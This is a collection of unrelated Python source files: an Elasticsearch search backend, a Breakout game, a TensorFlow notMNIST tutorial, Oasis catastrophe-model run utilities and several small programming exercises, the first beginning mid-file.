"vesicle_membrane",
"vesicle",
"MVB_membrane",
"MVB",
"lysosome_membrane",
"lysosome",
"LD_membrane",
"LD",
"er_membrane",
"er",
"ERES",
"NE",
"nuclear_pore",
"nuclear_pore_in",
"chromatin",
"NHChrom",
"EChrom",
"NEChrom",
"nucleus",
"nucleolus",
"microtubules",
"centrosome",
"distal_app",
"subdistal_app",
"ribosomes",
]
offset = "o505x505x505_m1170x1170x1170"
# main_multiscale_crop1(labels, offset)
main_multiscale_crop7(labels, offset)
# main_multiscale_crop14(labels, offset)
# main_multiscale_crop22(labels, offset)
# main_multiscale_crop8(labels, offset)
# main_multiscale_crop19(labels, offset)
# main_multiscale_crop9(labels, offset)
# main_multiscale_crop13(labels, offset)
# main_multiscale_crop15(labels, offset)
# main_multiscale_crop18(labels, offset)
# main_multiscale_crop20(labels, offset)
# main_multiscale_crop21(labels, offset)
# main_multiscale_crop3(labels, offset)
# main_multiscale_crop4(labels, offset)
# main_multiscale_crop6(labels, offset)
def run_main():
logging.basicConfig(level=logging.INFO)
main_cell2_crop1()
main_cell2_crop3()
main_cell2_crop6()
main_cell2_crop7()
main_cell2_crop8()
main_cell2_crop9()
main_cell2_crop13()
main_cell2_crop14()
main_cell2_crop15()
main_cell2_crop18()
main_cell2_crop19()
main_cell2_crop20()
main_cell2_crop21()
main_cell2_crop22()
if __name__ == "__main__":
run_main_multiscale()
|
import json
from contextlib import contextmanager
from django.conf import settings
from elasticsearch import Elasticsearch
from elasticsearch.exceptions import NotFoundError, RequestError, ConnectionError
from elasticsearch.helpers import bulk
DOCTYPE = 'doc'
ES_TIMEOUT = '100s'
ES_REQUEST_TIMEOUT = 100
ES_BATCH_REQUEST_TIMEOUT = 120
ENT_FIELDS = [
'entity',
'entity-type.location',
'entity-type.organization',
'entity-type.event',
'entity-type.person',
'entity-type.money',
]
ALL_FIELDS = [
'attachments',
'broken',
'content-type',
'date',
'date-created',
'email-domains',
'filename',
'filetype',
'from',
'id',
'sha3-256',
'in-reply-to',
'lang',
'location',
'md5',
'message',
'message-id',
'ocr',
'ocrimage',
'ocrpdf',
'ocrtext.*',
'path',
'path-parts',
'path-text',
'pgp',
'references',
'rev',
'sha1',
'size',
'subject',
'tags',
'text',
'thread-index',
'to',
'word-count',
'translated-from',
'translated-to',
"is-table",
"table-columns",
"table-sheets",
"table-sheet-count",
"table-row-count",
"table-col-count",
'skipped',
] + ENT_FIELDS
PRIVATE_TAGS_FIELD_PREFIX = "priv-tags."
INT_FIELDS = [
'size',
'word-count',
"table-sheet-count",
"table-row-count",
"table-col-count",
]
DATE_FIELDS = [
'date',
'date-created',
]
BOOL_FIELDS = [
'attachments',
'ocr',
'ocrimage',
'ocrpdf',
'pgp',
'has-thumbnails',
'has-pdf-preview',
"is-table",
"skipped",
]
TERM_OR_FIELDS = [
'email-domains',
'filetype',
'content-type',
'from',
'lang',
'thread-index',
'to',
'detected-objects.object.keyword',
'image-classes.class.keyword',
'translated-from',
'translated-to',
"table-columns",
"table-sheets",
] + [x + '.keyword' for x in ENT_FIELDS]
TERM_AND_FIELDS = [
'tags',
]
SOURCE_FIELDS = [
'path',
'filename',
'url',
]
def get_fields(user_uuid):
assert user_uuid
private_tags_field = PRIVATE_TAGS_FIELD_PREFIX + user_uuid
SOURCE = SOURCE_FIELDS + INT_FIELDS \
+ DATE_FIELDS + BOOL_FIELDS + TERM_OR_FIELDS \
+ TERM_AND_FIELDS + [private_tags_field]
return {
'all': ALL_FIELDS + [private_tags_field],
'bool': BOOL_FIELDS,
'int': INT_FIELDS,
'date': DATE_FIELDS,
'term_or': TERM_OR_FIELDS,
'term_and': TERM_AND_FIELDS + [private_tags_field],
'highlight': ALL_FIELDS + [private_tags_field],
'_source': SOURCE,
}
class SearchError(Exception):
def __init__(self, reason):
self.reason = reason
@contextmanager
def elasticsearch():
try:
yield Elasticsearch(settings.HOOVER_ELASTICSEARCH_URL)
except ConnectionError:
raise SearchError('Could not connect to Elasticsearch.')
except RequestError as e:
reason = 'reason unknown'
try:
if e.info:
reason = e.info['error']['root_cause'][0]['reason']
except LookupError:
pass
raise SearchError('Elasticsearch failed: ' + reason)
def create_index(collection_id, name):
with elasticsearch() as es:
es.indices.create(index=_index_name(collection_id))
def _index_name(collection_id):
from .models import Collection
return Collection.objects.get(id=collection_id).index
def _index_id(index):
from .models import Collection
return Collection.objects.get(index=index).id
def index(collection_id, doc_id, body):
with elasticsearch() as es:
es.index(
index=_index_name(collection_id),
doc_type=DOCTYPE,
id=doc_id,
body=body,
)
def bulk_index(collection_id, docs):
def index(id, data):
return dict(
data,
_op_type='index',
_index=_index_name(collection_id),
_type=DOCTYPE,
_id=id,
)
with elasticsearch() as es:
_, err = bulk(
es,
(index(id, data) for id, data in docs),
stats_only=True,
request_timeout=ES_REQUEST_TIMEOUT,
)
if err:
raise RuntimeError("Bulk indexing failed on %d documents" % err)
def versions(collection_id, doc_id_list):
with elasticsearch() as es:
res = es.search(
index=_index_name(collection_id),
body={
'size': len(doc_id_list),
'query': {'ids': {'values': doc_id_list}},
'fields': ['_hoover.version'],
},
allow_partial_search_results=False,
timeout=ES_TIMEOUT,
request_timeout=ES_REQUEST_TIMEOUT,
)
hits = res['hits']['hits']
assert len(hits) == res['hits']['total']
return {
hit['_id']: hit['fields'].get('_hoover.version', [None])[0]
for hit in hits
}
def get(collection_id, doc_id):
with elasticsearch() as es:
return es.get(
index=_index_name(collection_id),
doc_type=DOCTYPE,
id=doc_id,
)
def _get_indices(collections):
from .models import Collection
indices = ','.join(
c.index for c in
Collection.objects.filter(name__in=collections)
)
return indices
def batch_count(query_strings, collections, aggs=None):
def _build_query_lines(query_string, meta={}, aggs=None):
query_body = {
"query": {
"query_string": {
"query": query_string,
"default_operator": "AND",
}
},
"size": 0
}
if aggs:
query_body['aggs'] = aggs
return json.dumps(meta) + "\n" + json.dumps(query_body) + "\n"
indices = _get_indices(collections)
body = "".join(
_build_query_lines(q, {}, aggs)
for q in query_strings
)
with elasticsearch() as es:
rv = es.msearch(
index=indices,
body=body,
doc_type=DOCTYPE,
request_timeout=ES_BATCH_REQUEST_TIMEOUT,
max_concurrent_searches=settings.ES_BATCH_MAX_CONCURRENT_SEARCHES,
)
for query_string, response in zip(query_strings, rv.get('responses', [])):
response['_query_string'] = query_string
return rv
def search(query, _source, highlight, collections, from_, size, sort, aggs, post_filter, search_after):
indices = _get_indices(collections)
if not indices:
# if index='', elasticsearch will search in all indices, so we make
# sure to return an empty result set
empty_query = {'query': {'bool': {'must_not': {'match_all': {}}}}}
with elasticsearch() as es:
return (es.search(body=empty_query), {})
body = {
'from': from_,
'size': size,
'query': query,
'sort': sort,
'aggs': dict(aggs, **{
'count_by_index': {
'terms': {
'field': '_index',
'size': len(indices)
},
},
}),
}
if _source:
body['_source'] = _source
if post_filter:
body['post_filter'] = post_filter
if search_after and len(search_after) > 0:
body['search_after'] = search_after
# remove 'from' when 'search_after' is present
if 'from' in body:
del body['from']
if highlight:
body['highlight'] = highlight
with elasticsearch() as es:
rv = es.search(
index=indices,
ignore_unavailable=True,
allow_partial_search_results=False,
request_cache=True,
batched_reduce_size=settings.ES_BATCHED_REDUCE_SIZE,
max_concurrent_shard_requests=settings.ES_MAX_CONCURRENT_SHARD_REQUESTS,
timeout=ES_TIMEOUT,
request_timeout=ES_REQUEST_TIMEOUT,
body=body,
)
aggs = (
rv
.get('aggregations', {})
.get('count_by_index', {})
.get('buckets', [])
)
count_by_index = {
_index_id(b['key']): b['doc_count']
for b in aggs
}
return (rv, count_by_index)
def delete_index(collection_id, ok_missing=False):
with elasticsearch() as es:
es.indices.delete(
index=_index_name(collection_id),
ignore=[404] if ok_missing else [],
)
def delete_all():
with elasticsearch() as es:
for index in es.indices.get(index='*'):
if index.startswith(settings.ELASTICSEARCH_INDEX_PREFIX):
es.indices.delete(index=index)
def refresh():
with elasticsearch() as es:
es.indices.refresh()
def count(collection_id):
with elasticsearch() as es:
try:
return es.count(index=_index_name(collection_id))['count']
except NotFoundError:
return None
def aliases(collection_id):
with elasticsearch() as es:
name = _index_name(collection_id)
alias_map = es.indices.get_aliases(index=name)
return set(alias_map.get(name, {}).get('aliases', {}))
def create_alias(collection_id, name):
index = _index_name(collection_id)
with elasticsearch() as es:
try:
es.indices.put_alias(index=index, name=name)
except NotFoundError:
es.indices.create(index=index)
es.indices.put_alias(index=index, name=name)
def delete_aliases(collection_id):
with elasticsearch() as es:
es.indices.delete_alias(index=_index_name(collection_id), name='*')
def set_mapping(collection_id, properties):
with elasticsearch() as es:
es.indices.put_mapping(
index=_index_name(collection_id),
doc_type=DOCTYPE,
body={'properties': properties},
)
def status():
with elasticsearch() as es:
return {
index: {
'aliases': list(amap['aliases']),
'documents': es.count(index=index)['count'],
}
for index, amap in es.indices.get_aliases().items()
}
def list_indices():
with elasticsearch() as es:
for index in es.indices.get(index='*'):
if index.startswith(settings.ELASTICSEARCH_INDEX_PREFIX):
suffix = index[len(settings.ELASTICSEARCH_INDEX_PREFIX):]
try:
collection_id = int(suffix)
except ValueError:
continue
yield collection_id
|
"""
Решить в целых числах уравнение: (ax+b) / (cx+d) =0
Формат ввода
Вводятся 4 числа: a,b,c,d; c и d не равны нулю одновременно.
Формат вывода Необходимо вывести все решения, если их число конечно, “NO” (без кавычек), если решений нет,
и “INF” (без кавычек), если решений бесконечно много.
"""
a, b, c, d = int(input()), int(input()), int(input()), int(input())
if a == 0 and b == 0:
print("INF")
elif a == 0 or a * d == b * c:
print("NO")
elif b // a * a == b:
print(-b // a)
else:
print("NO")
|
"""
stanCode Breakout Project
Adapted from Eric Roberts's Breakout by
Sonja Johnson-Yu, Kylie Jue, Nick Bowman,
and Jerry Liao
Name: Kevin Chen
"""
from campy.graphics.gwindow import GWindow
from campy.graphics.gobjects import GOval, GRect, GLabel
from campy.gui.events.mouse import onmouseclicked, onmousemoved
from campy.gui.events.timer import pause
import random
BRICK_SPACING = 5 # Space between bricks (in pixels). This space is used for horizontal and vertical spacing.
BRICK_WIDTH = 40 # Height of a brick (in pixels).
BRICK_HEIGHT = 15 # Height of a brick (in pixels).
BRICK_ROWS = 10 # Number of rows of bricks.
BRICK_COLS = 10 # Number of columns of bricks.
BRICK_OFFSET = 50 # Vertical offset of the topmost brick from the window top (in pixels).
BALL_RADIUS = 10 # Radius of the ball (in pixels).
PADDLE_WIDTH = 75 # Width of the paddle (in pixels).
PADDLE_HEIGHT = 15 # Height of the paddle (in pixels).
PADDLE_OFFSET = 50 # Vertical offset of the paddle from the window bottom (in pixels).
INITIAL_Y_SPEED = 7 # Initial vertical speed for the ball.
MAX_X_SPEED = 5 # Maximum initial horizontal speed for the ball.
class BreakoutGraphics:
# Constructor
def __init__(self, ball_radius=BALL_RADIUS, paddle_width=PADDLE_WIDTH,
paddle_height=PADDLE_HEIGHT, paddle_offset=PADDLE_OFFSET,
brick_rows=BRICK_ROWS, brick_cols=BRICK_COLS,
brick_width=BRICK_WIDTH, brick_height=BRICK_HEIGHT,
brick_offset=BRICK_OFFSET, brick_spacing=BRICK_SPACING,
title='Breakout'):
# Create a graphical window, with some extra space
window_width = brick_cols * (brick_width + brick_spacing) - brick_spacing
window_height = brick_offset + 3 * (brick_rows * (brick_height + brick_spacing) - brick_spacing)
self.window = GWindow(width=window_width, height=window_height, title=title)
# Play pilot animation
self.pilot()
# After the pilot, start the game
# Create a paddle
self.paddle_offset = paddle_offset
self.paddle = GRect(paddle_width, paddle_height)
self.paddle.filled = True
self.paddle.fill_color = 'black'
self.paddle.color = 'black'
self.window.add(self.paddle, x=(self.window.width - self.paddle.width) / 2,
y=(self.window.height - paddle_offset))
# Draw bricks
self.brick_width = brick_width
self.brick_height = brick_height
self.brick_offset = brick_offset
self.brick_spacing = brick_spacing
self.brick_rows = brick_rows
self.brick_cols = brick_cols
for i in range(self.brick_rows):
for j in range(self.brick_cols):
self.brick = GRect(brick_width, brick_height)
self.brick.filled = True
if i // 2 == 0:
self.brick.fill_color = 'salmon'
self.brick.color = 'salmon'
elif i // 2 == 1:
self.brick.fill_color = 'gold'
self.brick.color = 'gold'
elif i // 2 == 2:
self.brick.fill_color = 'lightskyblue'
self.brick.color = 'lightskyblue'
elif i // 2 == 3:
self.brick.fill_color = 'cornflowerblue'
self.brick.color = 'cornflowerblue'
else:
self.brick.fill_color = 'royalblue'
self.brick.color = 'royalblue'
self.window.add(self.brick, x=(j * (brick_width + brick_spacing)),
y=(brick_offset + i * (brick_height + brick_spacing)))
# Center a filled ball in the graphical window
self.radius = ball_radius
self.ball = GOval(self.radius * 2, self.radius * 2)
self.ball.filled = True
self.ball.fill_color = 'black'
self.ball.color = 'black'
self.window.add(self.ball, x=(self.window.width - self.ball.width) / 2,
y=(self.window.height - self.ball.height) / 2)
# Default initial velocity for the ball
self.__dx = 0
self.__dy = 0
# Initialize our mouse listeners
onmouseclicked(self.starter)
onmousemoved(self.paddle_control)
self.mouse_switch = True
# Show the score board
self.__score = 0
self.score_board = GLabel('Score: ' + str(self.__score))
self.score_board.font = 'Courier-10'
self.window.add(self.score_board, 0, 20)
# Methods in this class
# Paddle controller
def paddle_control(self, m):
self.paddle.x = m.x - self.paddle.width / 2
if self.paddle.x <= 0:
self.paddle.x = 0
elif self.paddle.x + self.paddle.width >= self.window.width:
self.paddle.x = self.window.width - self.paddle.width
# Reset the ball to the initial position
def reset_ball(self):
self.__dx = 0
self.__dy = 0
self.ball.fill_color = 'black'
self.ball.color = 'black'
self.window.add(self.ball, x=(self.window.width - self.ball.width) / 2,
y=(self.window.height - self.ball.height) / 2)
self.mouse_switch = True
# Give the ball initial speed to start
def set_initial_velocity(self):
self.__dx = random.randint(1, MAX_X_SPEED)
self.__dy = INITIAL_Y_SPEED
if random.random() > 0.5:
self.__dx *= -1
# V(x) getter
def get_vx(self):
return self.__dx
# V(y) getter
def get_vy(self):
return self.__dy
# V(x) setter
def set_vx(self, new_vx):
self.__dx = new_vx
# V(y) setter
def set_vy(self, new_vy):
self.__dy = new_vy
# Score getter
def get_score(self):
return self.__score
# Score setter
def set_score(self, add_score):
self.__score += add_score
# Function for starting the game (used for onmouseclicked)
def starter(self, m):
if self.mouse_switch is True:
self.set_initial_velocity()
self.mouse_switch = False
# Method for detect if the ball hit something
def is_ball_collision(self):
for i in range(2):
for j in range(2):
ball_x = self.ball.x + 2 * i * self.radius
ball_y = self.ball.y + 2 * j * self.radius
maybe_object = self.window.get_object_at(ball_x, ball_y)
if maybe_object is not None:
return maybe_object
# Method for detect if there's remained bricks
def there_is_no_brick(self):
for i in range(BRICK_ROWS):
for j in range(BRICK_COLS):
maybe_brick = self.window.get_object_at(x=(j * (self.brick_width + self.brick_spacing)),
y=(self.brick_offset + i * (self.brick_height +
self.brick_spacing)))
if maybe_brick is not None:
return False
return True
# Method for remove all the object on the window
def remove_all(self):
for i in range(self.brick_rows):
for j in range(self.brick_cols):
maybe_object = self.window.get_object_at(x=(j * (self.brick_width + self.brick_spacing)),
y=(self.brick_offset + i * (self.brick_height
+ self.brick_spacing)))
if maybe_object is not None:
self.window.remove(maybe_object)
self.window.remove(self.paddle)
# Method for game over (no lives left)
def game_over(self):
game_over = GLabel('Game Over')
game_over.color = 'tomato'
game_over.font = 'Courier-30-bold'
self.window.add(game_over, x=(self.window.width - game_over.width) / 2, y=self.window.height / 2)
# Method for settlement
def congrats(self):
label_win = GLabel('Congratulations!')
label_win.color = 'navy'
label_win.font = 'Courier-30-bold'
self.window.add(label_win, x=(self.window.width - label_win.width) / 2, y=self.window.height / 2)
# Method for final score display
def show_score(self, score):
score_label = GLabel('Your Final Score: ' + str(score))
score_label.font = 'Courier-15'
self.window.add(score_label, x=(self.window.width - score_label.width) / 2, y=self.window.height / 2 + 60)
# Method for updating the score during the game
def score_board_update(self, score):
self.score_board.text = 'Score: ' + str(score)
# Method for the pilot animation
def pilot(self):
# Instructions
line_1 = GLabel('Welcome to my Breakout Game!')
line_1.font = 'Courier-12-bold'
line_2 = GLabel('Your mission is to get the highest score.')
line_2.font = 'Courier-12-bold'
line_3 = GLabel('No matter how you get it >.^')
line_3.font = 'Courier-12-bold'
self.window.add(line_1, x=(self.window.width - line_1.width) / 2, y=self.window.height - 40)
self.window.add(line_2, x=(self.window.width - line_2.width) / 2, y=self.window.height - 20)
self.window.add(line_3, x=(self.window.width - line_3.width) / 2, y=self.window.height)
# Animation
while True:
# Update
line_1.move(0, -5)
line_2.move(0, -5)
line_3.move(0, -5)
# Check
if line_1.y <= self.window.height / 2:
break
# Pause
pause(100)
pause(1000)
self.window.remove(line_1)
self.window.remove(line_2)
self.window.remove(line_3)
pause(1000)
|
def palindrome_pairs(list):
answer = []
for i, x in enumerate(list):
# print x, x[::-1]
if x[::-1] in list:
if i != list.index(x[::-1]):
# print 'index 1', i, 'index 2', list.index(x[::-1])
a = (i, list.index(x[::-1]))
answer.append(a)
a = set((a, b) if a <= b else (b, a) for a, b in answer)
if len(a) > 0:
return a
else:
return False
z = ['ii', ' ', '21']
print palindrome_pairs(z)
dictionary = {'all','and','mom'} |
from floodsystem.stationdata import build_station_list
from floodsystem.geo import rivers_by_station_number
stations = build_station_list()
print("\n"+str(rivers_by_station_number(stations,9))+"\n")
|
"""
一个机器人位于一个 m x n 网格的左上角 (起始点在下图中标记为“Start” )。
机器人每次只能向下或者向右移动一步。机器人试图达到网格的右下角(在下图中标记为“Finish”)。
现在考虑网格中有障碍物。那么从左上角到右下角将会有多少条不同的路径?
网格中的障碍物和空位置分别用 1 和 0 来表示。
说明:m 和 n 的值均不超过 100。
示例 1:
输入:
[
[0,0,0],
[0,1,0],
[0,0,0]
]
输出: 2
解释:
3x3 网格的正中间有一个障碍物。
从左上角到右下角一共有 2 条不同的路径:
1. 向右 -> 向右 -> 向下 -> 向下
2. 向下 -> 向下 -> 向右 -> 向右
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/unique-paths-ii
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
"""
from typing import List
class Solution:
def uniquePathsWithObstacles(self, obstacleGrid: List[List[int]]) -> int:
pass |
from __future__ import print_function
import numpy as np
import tensorflow as tf
from six.moves import cPickle as pickle
from six.moves import range
pickle_file = 'notMNIST.pickle'
with open(pickle_file, 'rb') as f:
save = pickle.load(f)
train_dataset = save['train_dataset']
train_labels = save['train_labels']
valid_dataset = save['valid_dataset']
valid_labels = save['valid_labels']
test_dataset = save['test_dataset']
test_labels = save['test_labels']
del save
print('Training set', train_dataset.shape, train_labels.shape)
print('Validation set', valid_dataset.shape, valid_labels.shape)
print('Test set', test_dataset.shape, test_labels.shape)
image_size = 28
num_labels = 10
def reformat(dataset,labels):
dataset = dataset.reshape((-1,image_size*image_size)).astype(np.float32)
labels = (np.arange(num_labels) == labels[:,None]).astype(np.float32)
return dataset, labels
train_dataset,train_labels = reformat(train_dataset,train_labels)
valid_dataset,valid_labels = reformat(valid_dataset,valid_labels)
test_dataset,test_labels = reformat(test_dataset,test_labels)
print('Training set',train_dataset.shape,train_labels.shape)
print('Validation set',valid_dataset.shape,valid_labels.shape)
print('Test set',test_dataset.shape,test_labels.shape)
train_subset = 10000
graph = tf.Graph()
with graph.as_default():
tf_train_dataset = tf.constant(train_dataset[:train_subset,:])
tf_train_labels = tf.constant(train_labels[:train_subset])
tf_valid_dataset = tf.constant(valid_dataset)
tf_test_dataset = tf.constant(test_dataset)
weights = tf.Variable(
tf.truncated_normal([image_size*image_size,num_labels]))
biases = tf.Variable(tf.zeros([num_labels]))
logits = tf.matmul(tf_train_dataset,weights) + biases
loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels = tf_train_labels,logits = logits ))
optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(loss)
train_prediction = tf.nn.softmax(logits)
valid_prediction = tf.nn.softmax(
tf.matmul(tf_valid_dataset, weights) + biases)
test_prediction = tf.nn.softmax(tf.matmul(tf_test_dataset,weights) + biases)
num_steps = 3001
'''
def accuracy(predictions,labels):
return(100.0*np.sum(np.argmax(predictions) == np.argmax(labels,1))/predictions.shape[0])
with tf.Session(graph=graph) as session:
tf.global_variables_initializer().run()
print('Initialized')
for step in range(num_steps):
_, l, predictions = session.run([optimizer, loss, train_prediction])
if (step % 100 == 0):
print('loss at step %d: %f'%(step,1))
print('Training accurecy:%.1f%%'% accuracy(
predictions,train_labels[:train_subset,:]))
print('Validation accuracy : %.1f%%' %accuracy(
valid_prediction.eval(),valid_labels))
print('Test accuracy: %.1f%%' % accuracy(test_prediction.eval(),test_labels))
'''
def accuracy(predictions, labels):
return (100.0 * np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1))
/ predictions.shape[0])
with tf.Session(graph=graph) as session:
# This is a one-time operation which ensures the parameters get initialized as
# we described in the graph: random weights for the matrix, zeros for the
# biases.
tf.global_variables_initializer().run()
print('Initialized')
for step in range(num_steps):
# Run the computations. We tell .run() that we want to run the optimizer,
# and get the loss value and the training predictions returned as numpy
# arrays.
_, l, predictions = session.run([optimizer, loss, train_prediction])
if (step % 100 == 0):
print('Loss at step %d: %f' % (step, l))
print('Training accuracy: %.1f%%' % accuracy(
predictions, train_labels[:train_subset, :]))
# Calling .eval() on valid_prediction is basically like calling run(), but
# just to get that one numpy array. Note that it recomputes all its graph
# dependencies.
print('Validation accuracy: %.1f%%' % accuracy(valid_prediction.eval(), valid_labels))
print('Test accuracy: %.1f%%' % accuracy(test_prediction.eval(), test_labels))
batch_size = 128
graph = tf.Graph()
with graph.as_default():
# Input data. For the training data, we use a placeholder that will be fed
# at run time with a training minibatch.
tf_train_dataset = tf.placeholder(tf.float32,
shape=(batch_size, image_size * image_size))
tf_train_labels = tf.placeholder(tf.float32, shape=(batch_size, num_labels))
tf_valid_dataset = tf.constant(valid_dataset)
tf_test_dataset = tf.constant(test_dataset)
# Variables.
weights = tf.Variable(
tf.truncated_normal([image_size * image_size, num_labels]))
biases = tf.Variable(tf.zeros([num_labels]))
# Training computation.
logits = tf.matmul(tf_train_dataset, weights) + biases
loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels=tf_train_labels, logits=logits))
# Optimizer.
optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(loss)
# Predictions for the training, validation, and test data.
train_prediction = tf.nn.softmax(logits)
valid_prediction = tf.nn.softmax(
tf.matmul(tf_valid_dataset, weights) + biases)
test_prediction = tf.nn.softmax(tf.matmul(tf_test_dataset, weights) + biases)
num_steps = 5001
with tf.Session(graph=graph) as session:
tf.global_variables_initializer().run()
print("Initialized")
for step in range(num_steps):
# Pick an offset within the training data, which has been randomized.
# Note: we could use better randomization across epochs.
offset = (step * batch_size) % (train_labels.shape[0] - batch_size)
# Generate a minibatch.
batch_data = train_dataset[offset:(offset + batch_size), :]
batch_labels = train_labels[offset:(offset + batch_size), :]
# Prepare a dictionary telling the session where to feed the minibatch.
# The key of the dictionary is the placeholder node of the graph to be fed,
# and the value is the numpy array to feed to it.
feed_dict = {tf_train_dataset : batch_data, tf_train_labels : batch_labels}
_, l, predictions = session.run(
[optimizer, loss, train_prediction], feed_dict=feed_dict)
if (step % 500 == 0):
print("Minibatch loss at step %d: %f" % (step, l))
print("Minibatch accuracy: %.1f%%" % accuracy(predictions, batch_labels))
print("Validation accuracy: %.1f%%" % accuracy(
valid_prediction.eval(), valid_labels))
print("Test accuracy: %.1f%%" % accuracy(test_prediction.eval(), test_labels))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Python utilities used for setting up the resources needed to complete a
model run, i.e. generating ktools outputs from Oasis files.
"""
from __future__ import print_function
import glob
import logging
import tarfile
from itertools import chain
import shutilwhich
import six
from pathlib2 import Path
from six import itervalues
__all__ = [
'create_binary_files',
'prepare_model_run_directory',
'prepare_model_run_inputs'
]
import os
import shutil
import subprocess
from ..utils.exceptions import OasisException
from .files import TAR_FILE, INPUT_FILES, GUL_INPUT_FILES, IL_INPUT_FILES
def prepare_model_run_directory(
run_dir_path,
oasis_files_src_path=None,
analysis_settings_json_src_file_path=None,
model_data_src_path=None,
inputs_archive=None,
):
"""
Ensures that the model run directory has the correct folder structure in
order for the model run script (ktools) to be executed.
::
<run_directory>
├── fifo
├── input
│ └── csv
├── output
├── static
└── work
If any subfolders are missing they are created.
Optionally, if the path to a set of Oasis files is provided then they
are copied into the ``input/csv`` subfolder.
Optionally, if the path to the analysis settings JSON file is provided
then it is copied to the base of the run directory.
Optionally, if the path to model data is provided then the files are
symlinked into the ``static`` subfolder provided the OS is of type
Darwin or Linux, otherwise the source folder tree is recursively
copied into the ``static`` subfolder.
:param run_directory: the model run directory
:type run_directory: str
:param oasis_files_src_path: path to a set of Oasis files
:type oasis_files_src_path: str
:param analysis_settings_json_src_file_path: analysis settings JSON file path
:type analysis_settings_json_src_file_path: str
:param model_data_src_path: model data source path
:type model_data_src_path: str
:param inputs_archive: path to a tar file containing input files
:type inputs_archive: str
"""
try:
for subdir in ['fifo', 'output', 'static', 'work']:
Path(run_dir_path, subdir).mkdir(parents=True, exist_ok=True)
if not inputs_archive:
Path(run_dir_path, 'input', 'csv').mkdir(parents=True, exist_ok=True)
else:
with tarfile.open(inputs_archive) as input_tarfile:
input_tarfile.extractall(path=(os.path.join(run_dir_path, 'input')))
if oasis_files_src_path:
oasis_files_destpath = os.path.join(run_dir_path, 'input', 'csv')
for p in os.listdir(oasis_files_src_path):
shutil.copy2(os.path.join(oasis_files_src_path, p), oasis_files_destpath)
if analysis_settings_json_src_file_path:
analysis_settings_json_dest_file_path = os.path.join(run_dir_path, 'analysis_settings.json')
shutil.copyfile(analysis_settings_json_src_file_path, analysis_settings_json_dest_file_path)
if model_data_src_path:
model_data_dest_path = os.path.join(run_dir_path, 'static')
for path in glob.glob(os.path.join(model_data_src_path, '*')):
filename = os.path.basename(path)
try:
os.symlink(path, os.path.join(model_data_dest_path, filename))
except Exception:
shutil.copytree(model_data_src_path, os.path.join(model_data_dest_path, filename))
except OSError as e:
raise OasisException(e)
def _prepare_input_bin(run_directory, bin_name, model_settings, setting_key=None):
bin_file_path = os.path.join(run_directory, 'input', '{}.bin'.format(bin_name))
if not os.path.exists(bin_file_path):
setting_val = model_settings.get(setting_key)
if not setting_val:
model_data_bin_file_path = os.path.join(run_directory, 'static', '{}.bin'.format(bin_name))
else:
# Format for data file names
setting_val = setting_val.replace(' ', '_').lower()
model_data_bin_file_path = os.path.join(run_directory, 'static', '{}_{}.bin'.format(bin_name, setting_val))
if not os.path.exists(model_data_bin_file_path):
raise OasisException('Could not find {} data file: {}'.format(bin_name, model_data_bin_file_path))
shutil.copyfile(model_data_bin_file_path, bin_file_path)
def prepare_model_run_inputs(analysis_settings, run_directory):
"""
Sets up binary files in the model inputs directory.
:param analysis_settings: model analysis settings dict
:type analysis_settings: dict
:param run_directory: model run directory
:type run_directory: str
"""
try:
model_settings = analysis_settings.get('model_settings', {})
_prepare_input_bin(run_directory, 'events', model_settings, setting_key='event_set')
_prepare_input_bin(run_directory, 'returnperiods', model_settings)
_prepare_input_bin(run_directory, 'occurrence', model_settings, setting_key='event_occurrence_id')
if os.path.exists(os.path.join(run_directory, 'static', 'periods.bin')):
_prepare_input_bin(run_directory, 'periods', model_settings)
except (OSError, IOError) as e:
raise OasisException(e)
def check_inputs_directory(directory_to_check, do_il=False, check_binaries=True):
"""
Check that all the required csv files are present in the directory.
Args:
``directory`` (string): the directory containing the CSV files.
``do_il`` (bool): do insured loss. If True, FM file must be present.
Returns:
None
"""
file_path = os.path.join(directory_to_check, TAR_FILE)
if os.path.exists(file_path):
raise OasisException("Inputs tar file already exists: {}".format(file_path))
if do_il:
input_files = (f['name'] for f in six.itervalues(INPUT_FILES) if f['type'] != 'optional')
else:
input_files = (f['name'] for f in six.itervalues(INPUT_FILES) if f['type'] not in ['optional', 'il'])
for input_file in input_files:
file_path = os.path.join(directory_to_check, input_file + ".csv")
if not os.path.exists(file_path):
raise OasisException("Failed to find {}".format(file_path))
if check_binaries:
file_path = os.path.join(directory_to_check, input_file + ".bin")
if os.path.exists(file_path):
raise OasisException("Binary file already exists: {}".format(file_path))
def create_binary_files(csv_directory, bin_directory, do_il=False):
"""
Create the binary files.
:param csv_directory: the directory containing the CSV files
:type csv_directory: str
:param bin_directory: the directory to write the binary files
:type bin_directory: str
:param do_il: whether to perform insured loss (IL) calculations; if true, FM file must be present
:type do_il: bool
"""
csvdir = os.path.abspath(csv_directory)
bindir = os.path.abspath(bin_directory)
if do_il:
input_files = itervalues(INPUT_FILES)
else:
input_files = (f for f in itervalues(INPUT_FILES) if f['type'] != 'il')
for input_file in input_files:
conversion_tool = input_file['conversion_tool']
input_file_path = os.path.join(csvdir, '{}.csv'.format(input_file['name']))
if not os.path.exists(input_file_path):
continue
output_file_path = os.path.join(bindir, '{}.bin'.format(input_file['name']))
cmd_str = "{} < {} > {}".format(conversion_tool, input_file_path, output_file_path)
try:
subprocess.check_call(cmd_str, stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
raise OasisException(e)
def check_binary_tar_file(tar_file_path, check_il=False):
"""
Checks that all required files are present
:param tar_file_path: Path to the tar file to check
:type tar_file_path: str
:param check_il: Flag whether to check insured loss files
:type check_il: bool
:raises OasisException: If a required file is missing
:return: True if all required files are present
"""
expected_members = ('{}.bin'.format(f['name']) for f in six.itervalues(GUL_INPUT_FILES))
if check_il:
expected_members = chain(expected_members, ('{}.bin'.format(f['name']) for f in six.itervalues(IL_INPUT_FILES)))
with tarfile.open(tar_file_path) as tar:
for member in expected_members:
try:
tar.getmember(member)
except KeyError:
raise OasisException('{} is missing from the tar file {}.'.format(member, tar_file_path))
return True
def create_binary_tar_file(directory):
"""
Package the binaries in a gzipped tar.
"""
original_cwd = os.getcwd()
